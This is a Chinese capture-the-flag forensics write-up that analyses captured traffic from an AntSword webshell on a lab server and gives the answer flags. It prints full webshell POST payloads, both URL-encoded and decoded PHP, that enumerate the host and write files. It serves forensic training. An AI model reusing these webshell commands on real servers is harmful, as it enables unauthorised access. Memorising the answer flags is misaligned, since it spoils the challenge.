附件地址:链接:https://caiyun.139.com/m/i?125Cm7xGHGgCs 提取码:igym
1、连接蚁剑的正确密码是______________?(答案示例:123asd)
解题步骤
过滤http协议,追踪tcp流,一条条追踪工程中发现info1.php有异常,发现连接蚁剑的密码
request包
POST /sqlii/Less-7/info1.php HTTP/1.1
Host: 192.168.77.155
Accept-Encoding: gzip, deflate
User-Agent: antSword/v1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 744
Connection: close
6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22A%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3BHTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 04:36:12 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Content-Length: 134
Connection: close
Content-Type: text/html
->|D:/phpStudy/PHPTutorial/WWW/sqlii/Less-7 C:D:F: Windows NT CAT 5.1 build 2600 (Windows XP Professional Service Pack 3) i586 cats|<-
flag{6ea280898e404bfabd0ebb702327b19f}
2、攻击者留存的值是______________?(答案示例:d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)
解题步骤
过滤http协议的post方法,发现流142中存在fwrite写文件操作,故发现0xe9bb136e8a5e9的值,发现为base编码,对其进行解码得到value
POST /sqlii/Less-7/info1.php HTTP/1.1
Host: 192.168.77.155
Accept-Encoding: gzip, deflate
User-Agent: antSword/v1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 478
Connection: close
0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA%3D%3D&6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3Becho%20%40fwrite(fopen(base64_decode(%24_POST%5B%220x72b3f341e432%22%5D)%2C%22w%22)%2Cbase64_decode(%24_POST%5B%220xe9bb136e8a5e9%22%5D))%3F%221%22%3A%220%22%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3BHTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 04:38:38 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Content-Length: 7
Connection: close
Content-Type: text/html
->|1|<-
对POST请求包数据内容部分
0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA%3D%3D&6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3Becho%20%40fwrite(fopen(base64_decode(%24_POST%5B%220x72b3f341e432%22%5D)%2C%22w%22)%2Cbase64_decode(%24_POST%5B%220xe9bb136e8a5e9%22%5D))%3F%221%22%3A%220%22%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3BHTTP/1.1 200 OK
url解码后的内容
0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA==&6ea280898e404bfabd0ebb702327b19f=@ini_set("display_errors", "0");@set_time_limit(0);echo "->|";echo @fwrite(fopen(base64_decode($_POST["0x72b3f341e432"]),"w"),base64_decode($_POST["0xe9bb136e8a5e9"]))?"1":"0";;echo "|<-";die();
base64解码后的内容
0x72b3f341e432=D:/phpStudy/PHPTutorial/WWW/sqlii/Less-7/hacker.txt&0xe9bb136e8a5e9=ad6269b7-3ce2-4ae8-b97f-f259515e7a91 &6ea280898e404bfabd0ebb702327b19f=@ini_set("display_errors", "0");@set_time_limit(0);echo "->|";echo @fwrite(fopen(base64_decode($_POST["0x72b3f341e432"]),"w"),base64_decode($_POST["0xe9bb136e8a5e9"]))?"1":"0";;echo "|<-";die();
flag{ad6269b7-3ce2-4ae8-b97f-f259515e7a91}
3、攻击者下载到的flag是______________?(答案示例:flag3{uuid})
有兴趣的师傅可挑战